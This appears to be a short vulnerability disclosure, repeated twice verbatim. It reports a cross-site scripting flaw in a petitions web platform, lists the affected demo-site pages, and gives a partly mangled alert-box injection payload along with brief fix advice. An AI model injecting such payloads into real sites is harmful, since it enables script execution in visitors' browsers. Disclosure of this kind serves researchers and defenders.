endLesS
Webmaster
<------------------ header data start ------------------- >
#############################################################
# Application Name : Petitions platform
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : http://demo.petition.smailio.ro
# Author : Cyber-Warrior | Bug Researchers Group | HighVoltage
# Author Contact : https://twitter.com/VatanSavunmasi
# Tested on Demo Site : http://demo.petition.smailio.ro
# Exploit : http://demo.petition.smailio.ro/edit
http://demo.petition.smailio.ro/profile/petitions/signed
http://demo.petition.smailio.ro/profile/petitions/my-petitions
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(XSS);</Script>
< -- bug code end of -- >
#############################################################
# Application Name : Petitions platform
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Vendor Homepage : http://demo.petition.smailio.ro
# Author : Cyber-Warrior | Bug Researchers Group | HighVoltage
# Author Contact : https://twitter.com/VatanSavunmasi
# Tested on Demo Site : http://demo.petition.smailio.ro
# Exploit : http://demo.petition.smailio.ro/edit
http://demo.petition.smailio.ro/profile/petitions/signed
http://demo.petition.smailio.ro/profile/petitions/my-petitions
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(XSS);</Script>
< -- bug code end of -- >